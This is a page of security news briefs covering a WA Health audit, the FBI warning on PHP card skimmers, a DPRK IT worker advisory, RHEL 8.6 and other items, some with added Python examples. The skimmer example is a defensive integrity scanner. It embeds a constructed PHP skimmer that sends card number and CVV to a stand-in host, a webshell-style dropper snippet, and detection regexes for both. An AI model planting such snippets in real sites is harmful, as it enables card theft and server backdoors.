More stories

  • WA Health: No breaches of unencrypted COVID data means well managed and secure system

    Written by Chris Duckett, APAC Editor

    [Image: Perth city. Getty Images]
    The Auditor-General of Western Australia has once again taken state authorities to task over security weaknesses in government IT systems, this time in a report on the Public Health COVID Unified System (PHOCUS) tabled on Wednesday. PHOCUS is used within WA to record and contact-trace positive COVID cases, and can contain personal information such as case interviews, phone calls, text messages, emails, legal documents, pathology results, exposure history, symptoms, existing medical conditions, and medication details. The cloud-hosted system can also draw in check-in data from the SafeWA app (which the Auditor-General previously found WA Police had been able to access), as well as flight manifests, transit card records, business employee and customer records, G2G border-crossing pass data, and CCTV footage.

    The report found that WA Health had used encryption only in its test environment, was unable to tell whether malicious activity was occurring, and had no contract management plan with its vendor.

    “WA Health did not keep logs of user ‘view’ access to information in PHOCUS. Only ‘edits’ (changes or deletions) to information in the system were logged but WA Health did not monitor these logs for inappropriate activity,” the report said. “WA Health will not know if personal or medical information is inappropriately accessed (viewed or edited by WA Health staff or their third party vendors).

    “Following our audit enquiries, WA Health advised us they have now implemented a process to monitor edit access (data changes), but had not implemented a process to log view access (to detect snooping) due to perceived system performance issues.”

    Since the audit, the department has encrypted personal and medical information, extended data masking to all information in its test environment, and implemented a file upload denylist and brought a malware scanner online after the Auditor-General found that potentially malicious files could be uploaded to the system.
    “There were no data loss prevention controls in place to prevent unauthorised sharing of personal and medical information in PHOCUS, and WA Health did not monitor documents shared with external and unauthenticated parties. Poor controls can result in unauthorised disclosure of sensitive information and reputational damage to WA Health,” the report said.

    The report further found that WA Health’s third-party vendor had full access to the information in the production environment, which WA Health said had been assessed and balanced against the need to build the system quickly; that two administrator accounts were left over from a previous vendor; and that vendor contracts lacked “important security requirements”.

    In response to the audit, WA Health said that, because it was implementing four other COVID-related systems at the same time, the issues were appropriately managed and balanced development speed, quality, and resource demands.

    “No breach of privacy has occurred in relation to the system, continuous data cleansing and quality checking is undertaken, no inaccuracies in case status impacting management were found and no inappropriate use of the system was recorded,” the department said.

    “This demonstrates the robustness of PHOCUS and that the data is well managed and secure.”

  • Chromebook data sanitization comes to Blancco Drive Eraser

    Written by Adrian Kingsley-Hughes, Contributor

    The use of Chromebooks is exploding. During the past couple of years they became, and continue to be, the go-to cheap hardware for people working remotely. This has resulted, however, in piles and piles of Chromebooks that need their data securely wiped, either to put them back into service or to allow them to be disposed of. But sanitizing the data on Chromebooks can be a pain.

    Until now. Blancco has announced that Blancco Drive Eraser now supports Chromebook data sanitization. The new support gives a wide range of organizations (enterprises, IT asset disposition service providers, academic institutions, and so on) easy-to-use, fast, and secure data sanitization specifically for Chromebooks. Blancco Drive Eraser has been designed to decrease the amount of time needed to erase each device while preserving its native operating system, which speeds up the preparation of each Chromebook for reuse. Once data has been erased, Blancco Drive Eraser verifies that the sanitization completed successfully and issues a tamper-proof, digitally signed certificate of erasure to support regulatory compliance and reporting mandates.

    “While most students have returned to the classroom and employees are increasingly coming back to offices, the demand for Chromebooks has not waned,” said Alan Bentley, Blancco’s President of Global Strategy. “One forecast predicts nearly 30 million Chromebooks will be shipped globally in 2022 — a decrease of 21 percent from 2021 but more than double the number of units recorded in 2019,” Bentley added. “As more of these devices enter the ecosystem, and as more organizations look to be participants in the circular economy, they need a solution that allows them to quickly and safely reuse these devices. Blancco Drive Eraser now meets that need.”

    One of Blancco Drive Eraser’s main selling points is that it protects personally identifiable information (PII). “We are now able to give… organizations the ability to ensure device data is rendered completely unrecoverable. This capability allows them to confidently reuse or sell end-of-life devices instead of adding to the growing electronic waste crisis in our landfills,” Bentley said.

    Secure data sanitization for Chromebook is now available as part of Blancco Drive Eraser at no extra cost.

  • FBI: Hackers used malicious PHP code to grab credit card data

    The Federal Bureau of Investigations (FBI) is warning that someone is scraping credit card data from the checkout pages of US businesses’ websites. “As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server,” the FBI said in an alert.

    It said the “unidentified cyber actors” also established backdoor access to the victim’s system by modifying two files within the checkout page.

    JavaScript-based Magecart card-skimming attacks have been the main threat to e-commerce sites in recent years, but server-side PHP code remains a major source of card-skimming activity. The attackers began targeting US businesses in September 2020 by inserting malicious PHP code into customized online checkout pages. Earlier this year, the actors changed tactics, using a different PHP function: they create a basic backdoor using a debugging function that allows the system to download two webshells onto the US firm’s web server, giving the attackers backdoors for further exploitation.

    The FBI’s recommended mitigations include changing default login credentials on all systems, monitoring requests made against the e-commerce environment to identify possible malicious activity, segregating and segmenting network systems to limit how easily criminals can move from one to another, and securing all websites that transfer sensitive information with SSL (in current terms TLS; the SSL protocol versions themselves are deprecated and should be disabled).

    Security firm Sucuri observed that 41% of new credit card skimming malware samples in 2021 were PHP backend credit card skimmers. This suggests that scanning only for frontend JavaScript infections could miss a large proportion of card-skimming malware. As Sucuri explains, webshell backdoors give attackers full access to the website file system, often providing a full picture of the environment, including the server operating system and PHP versions, as well as the ability to change file permissions and move into adjacent websites and directories. Webshells accounted for 19% of 400 new malware signatures gathered by Sucuri in 2021.

    The firm saw a “hugely disproportionate” rise in signatures in 2021 for PHP-based credit card stealers affecting the e-commerce platforms Magento, WordPress and OpenCart.
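    As an added example (not code from the FBI alert or from Sucuri), the script below shows how a site operator could act on two of the points above: a file-integrity baseline of the checkout directory, which catches the modified and newly dropped PHP files the alert describes, and a source scan for the skimmer's building blocks (card-field capture paired with an outbound send to an external host, obfuscated eval, and a file writer that drops further PHP, as a webshell dropper would). The indicator regexes, the directory layout, the hostnames and the PHP snippets are all constructed for this example; the injected skimmer is modelled on the behaviour the alert describes, not copied from it.

```python
"""Baseline-and-scan check for a PHP checkout directory (added example).
The indicator regexes and the sample PHP below are constructed for this
example; they mirror the behaviour in the FBI alert, not its actual code."""
import hashlib
import re
import tempfile
from pathlib import Path

# Building blocks of a server-side skimmer: reading card fields from the
# request, an outbound send to an external URL, obfuscated eval, and a
# file writer that drops further PHP (the web shells in the alert).
INDICATORS = {
    "card_field_capture": re.compile(
        r"\$_(?:POST|REQUEST)\s*\[\s*['\"](?:cc_?number|card_?number|cvv2?|cc_?cvc|cc_?exp\w*)['\"]\s*\]",
        re.I),
    "outbound_send": re.compile(
        r"(?:curl_init|curl_setopt|file_get_contents|fsockopen|stream_socket_client)\s*\([^;]{0,300}https?://",
        re.I | re.S),
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "php_dropper": re.compile(r"file_put_contents\s*\([^;]{0,300}\.php", re.I | re.S),
}


def sha256_tree(root: Path) -> dict:
    """SHA-256 of every .php file under root, keyed by path relative to root."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*.php"))}


def integrity_diff(baseline: dict, current: dict) -> dict:
    """Files that appeared, vanished or changed since the known-good baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def scan_source(src: str) -> list:
    """Indicator names that fire on src, or [] if the combination is not suspicious.
    A checkout controller legitimately reads card fields and a payment SDK
    legitimately talks to a gateway; it is the pairing of the two in one file,
    or any obfuscated eval / PHP dropper, that is treated as a finding."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    suspicious = ("obfuscated_eval" in hits or "php_dropper" in hits
                  or {"card_field_capture", "outbound_send"} <= set(hits))
    return hits if suspicious else []


def audit(root: Path, baseline: dict):
    """Diff the tree against the baseline and scan only what changed."""
    diff = integrity_diff(baseline, sha256_tree(root))
    findings = {}
    for rel in diff["added"] + diff["modified"]:
        hits = scan_source((root / rel).read_text(errors="replace"))
        if hits:
            findings[rel] = hits
    return diff, findings


# --- constructed sample site -------------------------------------------------
CLEAN_CHECKOUT = """<?php
// stand-in for a store's checkout controller (constructed)
$order = new Order($_POST['order_id']);
$gateway = new Gateway('https://gateway.example/charge');
$gateway->charge($order);
"""

SKIMMER_SNIPPET = """
// injected by the attacker: copies card data to a lookalike "processor" host
$cc = $_POST['cc_number']; $cvv = $_POST['cvv'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://payments-processor.example/api');
curl_setopt($ch, CURLOPT_POSTFIELDS, base64_encode("$cc|$cvv"));
curl_exec($ch);
"""

DROPPER_SNIPPET = """<?php
// dropped file: writes whatever the attacker sends as a new PHP file
file_put_contents(__DIR__ . '/cache_' . time() . '.php', base64_decode($_GET['d']));
"""


def demo():
    """Baseline a clean tree, inject the skimmer and dropper, then audit."""
    root = Path(tempfile.mkdtemp())
    controller = root / "checkout" / "Checkout.php"
    controller.parent.mkdir()
    controller.write_text(CLEAN_CHECKOUT)
    baseline = sha256_tree(root)              # taken while the site is known-good
    controller.write_text(CLEAN_CHECKOUT + SKIMMER_SNIPPET)
    (root / "checkout" / "cache.php").write_text(DROPPER_SNIPPET)
    return audit(root, baseline)


if __name__ == "__main__":
    diff, findings = demo()
    print("integrity diff:", diff)
    print("findings:", findings)
```

    The baseline is the part that matters operationally: take it from a known-good deployment artefact, store it off the web server, and re-run the diff on a schedule, because a skimmer that lives inside an existing controller shows up only as a "modified" file, not a new one.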

  • US warning: North Korea's tech workers posing as freelance developers

    Skilled software and mobile app developers from North Korea are posing as US-based remote workers to land contract development work at US and European tech and crypto firms. The warning comes in a new joint advisory from the US Department of State, the US Department of the Treasury, and the Federal Bureau of Investigation (FBI) outlining the role North Korean IT workers play in raising revenue for North Korea, which contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of US and UN sanctions.


    Hackers working for North Korea, officially the Democratic People’s Republic of Korea (DPRK), have gained notoriety for sophisticated hacks on cryptocurrency exchanges over the past five years. In 2021 alone they stole over $400 million worth of cryptocurrency for the DPRK.

    The FBI, the US Cybersecurity and Infrastructure Security Agency (CISA), and Treasury last month warned that North Korea’s Lazarus Group, also tracked as APT38, was targeting exchanges in the blockchain and cryptocurrency industry with spear-phishing campaigns and malware. In April, Treasury also linked Lazarus to the $600 million heist in March from the Ronin network, the blockchain underpinning the play-to-earn game Axie Infinity.

    However, skilled North Korean IT workers serve another function for the DPRK: using their access as sub-contracted developers within US and European contracting firms to enable DPRK-sponsored hacking. The US government has outlined “red flag” indicators that a firm might be hiring North Korean freelance developers, and tips to “protect against inadvertently hiring or facilitating the operations of DPRK IT workers.”

    “The DPRK dispatches thousands of highly skilled IT workers around the world to generate revenue that contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions,” the advisory states. DPRK IT workers are primarily located in the People’s Republic of China (PRC) and Russia, but some are located in Africa and Southeast Asia, the US says. “The vast majority of [DPRK IT workers] are subordinate to and working on behalf of entities directly involved in the DPRK’s UN-prohibited WMD and ballistic missile programs, as well as its advanced conventional weapons development and trade sectors. This results in revenue generated by these DPRK IT workers being used by the DPRK to develop its WMD and ballistic programs, in violation of US and UN sanctions.”

    Rather than engaging directly in malicious cyber activity, DPRK IT workers use privileged access within contractor roles to provide logistical support to DPRK hackers by sharing access to virtual infrastructure, facilitating sales of stolen data, and assisting in the DPRK’s money laundering and virtual currency transfers. “Although DPRK IT workers normally engage in IT work distinct from malicious cyber activity, they have used the privileged access gained as contractors to enable the DPRK’s malicious cyber intrusions. Additionally, there are likely instances where workers are subjected to forced labor,” the warning notes.

    A tight labor market and high demand for software developers in the US and Europe work in favor of North Korean developers, who can earn at least ten times more than a conventional North Korean laborer working in a factory or on a construction project overseas. The roles DPRK tech workers specialize in reflect the hottest areas of tech in the West and globally: mobile and web apps, crypto exchange platforms and digital coins, mobile games, online gambling, AI-related applications, hardware and firmware development, VR and AR programming, facial and biometric recognition software, and database development. The DPRK workers often take on projects involving virtual currency in categories spanning business, health and fitness, social networking, sports, entertainment, and lifestyle, according to the advisory.

    Unsurprisingly, DPRK IT workers use VPNs and third-country IP addresses to conceal their internet connections and avoid violating the terms of service of the online platforms they use. They also use proxy accounts to bid for work, may use a dedicated device for banking to evade anti-money-laundering measures, and use forged and stolen identity documents to hide who they are.

    Red flags include:

    • multiple logins to one account from IP addresses linked to different countries within a short time;
    • developers logging into multiple accounts on the same platform from one IP address;
    • developers staying logged into accounts continuously for one or more days at a time;
    • router ports such as 3389 and other configurations associated with remote desktop-sharing software;
    • multiple developer accounts receiving high ratings from one client account in a short period;
    • extensive bidding on projects and a low number of accepted bids; and
    • frequent money transfers through payment platforms, especially to China-based bank accounts.

    The advisory notes that DPRK IT workers employed by a US firm fraudulently charged its payment account $50,000 in 30 small installments over a matter of months. The US agencies recommend that contracting firms conduct video interviews with applicants to verify their identity and reject low-quality images offered as proof of identity.
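    Three of the red flags above (one account from several countries in a short window, several accounts behind one IP, and sessions held open for a day or more) can be checked mechanically against a platform's login records. The script below is an added example of that, not tooling from the advisory or from any platform; the login records are constructed, the account names and documentation-range IPs are made up, and the country field is assumed to come from a GeoIP lookup performed upstream.

```python
"""Heuristics over freelance-platform login events for three of the red
flags in the advisory (added example, not the advisory's own tooling).
The login records below are constructed; the country field is assumed to
come from a GeoIP lookup done upstream."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple


class Login(NamedTuple):
    account: str
    ip: str
    country: str
    start: datetime
    end: datetime


def multi_country_accounts(events, window=timedelta(hours=24)) -> dict:
    """Accounts seen from two or more countries with logins under `window` apart."""
    by_account = defaultdict(list)
    for e in events:
        by_account[e.account].append(e)
    flagged = {}
    for account, logins in by_account.items():
        logins.sort(key=lambda e: e.start)
        for i, first in enumerate(logins):
            countries = {first.country}
            for later in logins[i + 1:]:
                if later.start - first.start > window:
                    break
                countries.add(later.country)
            if len(countries) >= 2:
                flagged[account] = sorted(countries)
                break
    return flagged


def shared_ips(events, min_accounts=2) -> dict:
    """IP addresses from which `min_accounts` or more distinct accounts logged in."""
    accounts = defaultdict(set)
    for e in events:
        accounts[e.ip].add(e.account)
    return {ip: sorted(a) for ip, a in accounts.items() if len(a) >= min_accounts}


def long_sessions(events, min_length=timedelta(hours=24)) -> list:
    """Sessions held open for `min_length` or longer, as (account, ip, hours)."""
    return [(e.account, e.ip, (e.end - e.start).total_seconds() / 3600)
            for e in events if e.end - e.start >= min_length]


def review(events) -> dict:
    """Run all three checks; an empty value means the check found nothing."""
    return {
        "multi_country": multi_country_accounts(events),
        "shared_ips": shared_ips(events),
        "long_sessions": long_sessions(events),
    }


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample: documentation IP ranges, made-up accounts and times.
SAMPLE = [
    Login("dev_alice", "203.0.113.10", "US", _t("2022-05-10T09:00"), _t("2022-05-10T17:00")),
    # same account from a second country eleven hours later
    Login("dev_alice", "198.51.100.7", "CN", _t("2022-05-10T20:00"), _t("2022-05-11T02:00")),
    # a different account from the IP alice just used, logged in for 49 hours
    Login("dev_bob", "198.51.100.7", "CN", _t("2022-05-11T03:00"), _t("2022-05-13T04:00")),
    # benign: one country, one IP, normal working hours
    Login("dev_carol", "192.0.2.44", "DE", _t("2022-05-12T08:00"), _t("2022-05-12T12:00")),
]

if __name__ == "__main__":
    for check, result in review(SAMPLE).items():
        print(f"{check}: {result or 'nothing flagged'}")
```

    None of these is proof on its own: a travelling contractor trips the country check and a shared corporate NAT trips the IP check, which is why the advisory pairs the indicators with identity verification rather than treating any one of them as disqualifying.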

  • Singapore firms see high rate of security incidents, but struggle to respond promptly

    Written by Eileen Yu, Contributor

    A larger proportion of organisations in Singapore experienced at least six cybersecurity incidents in the past year than their counterparts across 10 other global markets. However, just 49% in the Asian nation are able to respond to a threat within 24 hours, compared with the global average of 70%. Some 65% of organisations in Singapore saw at least six security incidents, the highest amongst the 11 markets surveyed in a study commissioned by Infoblox that polled 100 respondents in the country. Globally, 46% of organisations encountered at least six security incidents. Conducted by CyberRisk Alliance’s Business Intelligence Unit, the survey had 1,100 respondents in total from markets that also included Australia, Germany, the US, and the UK.

    In Singapore, 73% said cybersecurity incidents led to an actual breach, compared with 34% globally who saw at least one breach. Some 45% pointed to a cloud application or infrastructure as the source of a breach, while 42% cited an IoT device or network and 32% blamed an employee-owned endpoint device. Globally, 32% said their organisation’s security breaches originated from Wi-Fi access points, while 29% pointed to a cloud application or infrastructure. Another 29% cited an employee-owned endpoint device and 25% blamed a third-party or supply chain services provider.

    As a result of breaches, 57% in Singapore said hackers exposed sensitive data, while 53% suffered system outages or downtime and 43% had to deal with malware infections. The survey also found that 33% incurred direct and indirect losses of up to $1 million due to a security breach. Globally, this figure was higher, at 43%, with respondents highlighting the cost of operating amid the pandemic, when more sensitive data had to be shared via multiple channels.

    Asked about the challenges they faced safeguarding their network against attacks, 33% globally pointed to monitoring remote work access and 28% noted a lack of budget. In Singapore, 32% cited poor network visibility, 32% highlighted a shortage of security skills, and 28% faced budget restraints. Data leakage was the top cybersecurity concern for 51% of companies in Singapore, while 42% were anxious about remote connections and 35% felt the same about networked IoT attacks. Some 29% also expressed concern about attacks through cloud services. Worldwide, data leakage was also the top concern, for 49% of respondents, followed by ransomware at 39% and attacks via remote connections at 36%.

    To cope with the threat landscape, 73% in Singapore said their organisation had increased its IT security budget last year, and 69% expected this upward trend to continue this year. Globally, 71% expected their IT security budgets to increase this year. Some 28% in Singapore said they would invest in DNS security, while 26% said likewise for network security tools. Another 37% would put funds into data encryption and 36% were opting for cloud access security brokers. Some 60% currently used DNS controls as part of their cybersecurity strategy to block and flag malicious traffic and devices. Another 61% had implemented SASE (secure access service edge) infrastructures, with 29% indicating plans to do likewise.

  • US prosecutors allege Venezuelan doctor is ransomware mastermind

    May 16, 2022 | Topic: Legal

    US prosecutors have accused 55-year-old Venezuelan cardiologist Moises Luis Zagala Gonzalez, also known as Nosophoros, Aesculapius and Nebuchadnezzar, of being the mastermind behind a slew of notorious ransomware. According to Justice Department officials, Zagala is alleged to have set up a cybercriminal enterprise in which he held an economic and reputational interest in his software being used in successful cyberattacks.

    “We allege Zagala not only created and sold ransomware products to hackers, but also trained them in their use. Our actions today will prevent Zagala from further victimizing users,” assistant director-in-charge Michael Driscoll said. “Many other malicious criminals are searching for businesses and organizations that haven’t taken steps to protect their systems — which is an incredibly vital step in stopping the next ransomware attack.”

    Ransomware products associated with Zagala include Jigsaw and the private ransomware builder Thanos. Jigsaw has been around since 2016 and is known for its dramatic means of pressuring victims to pay up fast, borrowing the premise of the 2004 film Saw, in which characters must solve puzzles within a time limit or face fatal consequences. Thanos, presumably named after the Marvel supervillain, first appeared in 2019 and allows users to build their own ransomware. In 2020, while investigating security incidents at several prominent Israeli organisations, security researchers from ClearSky and Profero said they linked the use of Thanos ransomware to MuddyWater, a known Iranian state-sponsored hacking group.

    “Combating ransomware is a top priority of the Department of Justice and of this Office. If you profit from ransomware, we will find you and disrupt your malicious operations,” said US Attorney Breon Peace. Despite this, if convicted, Zagala faces only up to five years’ imprisonment for attempted computer intrusion and five years’ imprisonment for conspiracy to commit computer intrusions.

  • Red Hat Enterprise Linux 8.6: Better security, more options

    Do you want a solid Linux distribution that also delivers the latest languages and solid security? Yes? Then consider Red Hat Enterprise Linux 8.6. Red Hat announced the new release at the Red Hat Summit. It has numerous new features, but the ones that caught my eye were the security improvements.

    For example, if you are serious about securing your Linux systems, you should run Security-Enhanced Linux (SELinux). But SELinux has long had a basic problem: because its Common Intermediate Language (CIL) could not store the module name and version inside the module itself, there was no simple way to verify that an installed policy module was the version you intended. That is a familiar software supply-chain problem. RHEL 8.6 lets you obtain a SHA-256 checksum of each installed SELinux module and compare it against the checksum of the module file you meant to deploy, so you can confirm you are actually running the correct policy. Keep in mind that a checksum only establishes integrity against a reference you already trust; it is not a signature and does not prove who produced the module.

    Continuing with configuration file security, RHEL’s OpenSSH server now supports drop-in configuration files: sshd_config honors the Include directive, so configuration can be split across files in another directory. That matters because it makes it easier to apply system-specific settings with automation tools such as Ansible Engine, and to keep separate configuration files for separate purposes, such as filtering incoming connections. One caveat worth knowing: sshd uses the first value it encounters for a keyword, so the position of the Include line in sshd_config decides whether the drop-ins or the main file win.

    Libreswan, a popular open-source IPsec VPN and Internet Key Exchange (IKE) implementation, has been rebased to upstream version 4.5. This brings many bug fixes and enhancements, including IKEv2 support for Labeled IPsec, which helps Libreswan work better on SELinux systems.

    For SAP HANA users, the big news is a jointly tested RHEL SAP HANA configuration with SELinux enabled. SELinux confines processes under mandatory access control, so a compromised process cannot reach beyond what its policy allows, which is strong protection against privilege escalation attacks.

    At a higher level, RHEL’s web console now supports smart card authentication with sudo and SSH. With the growing need for two-factor authentication (2FA), this is a big step forward for day-to-day security.

    For developers, the biggest news is that RHEL 8.6 now comes with PHP 8 and Perl 5.32. It also includes GCC 11, LLVM 13.0.1, Rust 1.58.1, Go 1.17.7 and OpenJDK 17, along with Apache Log4j 2. In other words, it supports today’s most up-to-date languages and toolchains.

    If you need high availability (HA), RHEL 8.6 also comes with an HA Cluster System Role, which makes it much easier to build consistent and stable RHEL HA clusters. Life is also easier for SAP HANA users because SAP day-1 automation uses the Red Hat Ansible Automation Platform to automate SAP HANA setup and configuration. Additionally, these new RHEL system roles are now available as Ansible collections, giving organizations more flexibility in how they consume SAP automation content. All these SAP HANA improvements make RHEL much more competitive with SUSE’s SAP HANA offerings.

    Put it all together and what you get is a great, solid enterprise Linux for Red Hat users on everything from a simple server in the back room to the data center, the public cloud, the hybrid cloud and beyond. RHEL 8.6 is available now for everyone with an active RHEL subscription. Don’t have one and want to give the latest RHEL a try? You can download a 60-day evaluation edition of RHEL 8.6 to see if it works for you.
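    The sshd Include directive mentioned above has one property that bites people who adopt drop-in files: sshd keeps the first value it reads for each keyword, so drop-ins only override the main file when the Include line comes before the settings it is meant to override. The toy resolver below, an added example and not OpenSSH's own parser, builds a constructed sshd_config plus two drop-ins in a temporary directory and resolves them both ways. It handles only global keywords (it stops at the first Match block, whose settings are conditional) and resolves relative Include paths against the directory of the main file, where the real daemon resolves them against /etc/ssh; the file names and option values are made up for the example.

```python
"""Resolver showing how sshd combines sshd_config with Include'd drop-ins
(added example; a toy, not OpenSSH's parser). sshd keeps the first value it
sees for each keyword, so the position of the Include line sets precedence.
Files are constructed in a temp dir; the real daemon reads /etc/ssh and
resolves relative Include paths against it."""
import glob
import os
import tempfile
from pathlib import Path


def _entries(path: Path):
    """Yield (keyword, value, source file) in the order sshd would read them."""
    for raw in path.read_text().splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)              # 'Keyword value'; '=' form not handled
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "include":
            for pattern in value.split():
                if not os.path.isabs(pattern):
                    pattern = str(path.parent / pattern)   # sshd: relative to /etc/ssh
                for included in sorted(glob.glob(pattern)):  # glob results in name order
                    yield from _entries(Path(included))
        elif keyword == "match":
            return  # everything after Match is conditional, so not part of the global view
        else:
            yield keyword, value, path.name


def effective_config(main: Path) -> dict:
    """{keyword: (value, source file)} under sshd's first-value-wins rule."""
    effective = {}
    for keyword, value, source in _entries(main):
        effective.setdefault(keyword, (value, source))
    return effective


def demo(include_first: bool = True) -> dict:
    """Build a constructed /etc/ssh-style layout and resolve it."""
    etc = Path(tempfile.mkdtemp())
    (etc / "sshd_config.d").mkdir()
    base = ["PermitRootLogin yes", "PasswordAuthentication yes", "X11Forwarding no"]
    include = "Include sshd_config.d/*.conf"
    lines = [include] + base if include_first else base + [include]
    (etc / "sshd_config").write_text("\n".join(lines) + "\n")
    (etc / "sshd_config.d" / "10-hardening.conf").write_text(
        "PermitRootLogin no\nPasswordAuthentication no\n")
    (etc / "sshd_config.d" / "50-site.conf").write_text(
        "PermitRootLogin prohibit-password\n")   # sorts after 10-, so it loses
    return effective_config(etc / "sshd_config")


if __name__ == "__main__":
    print("Include first:", demo(True))
    print("Include last: ", demo(False))
```

    With the Include at the top, the hardening drop-in wins (PermitRootLogin no); with the Include at the bottom, the main file's PermitRootLogin yes silently stays in force even though the drop-in is present. On a real host, `sshd -T` prints the effective configuration and is the authoritative check after editing drop-ins.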

  • Brazilian e-commerce firm Americanas reports multimillion-dollar loss following cyberattack

    Written by Angelica Mari, Contributing Editor

    Brazilian e-commerce conglomerate Americanas.com reported a multimillion-dollar loss in sales in its financial results on Friday after a major cyberattack earlier this year. The company lost 923 million Brazilian reais ($183 million) in sales after two attacks that took place between February 19 and 20 and rendered its e-commerce operation unavailable. According to the company, physical stores continued to operate and the logistics arm of the company continued to deliver orders placed after the event.

    “In order to add strength to our internal team and security partner companies in the resolution and investigation of this incident, we called on world-renowned experts with experience in situations like these,” the company said in its financial statement. According to Americanas, operations began to be gradually restored on February 23 and activities fully resumed the following day. “There is no evidence of other damages, beyond the fact that our e-commerce operations were suspended,” the firm noted.

    Despite the impact of the incident, the company reported a 22% increase in total sales compared with the same period last year. According to the firm’s results, digital sales increased 20% in the first quarter of the year as the pace of sales resumed in the weeks following the incident. The company noted that, had the cyberattack not happened, sales growth would have reached 30%.

    The authors of the Americanas attack are understood to be the Lapsus$ Group, the group responsible for a major ransomware attack against Brazil’s Ministry of Health in December 2021 that left the COVID-19 vaccination data of millions of citizens unavailable. According to analyst firm IDC, overall IT security spending in Brazil is expected to reach nearly $1 billion this year, an increase of 10% over 2020. The research company predicts that 2022 will see firms dealing with an increasing number of cyberattacks, a trend that has gathered pace since the start of the COVID-19 pandemic.
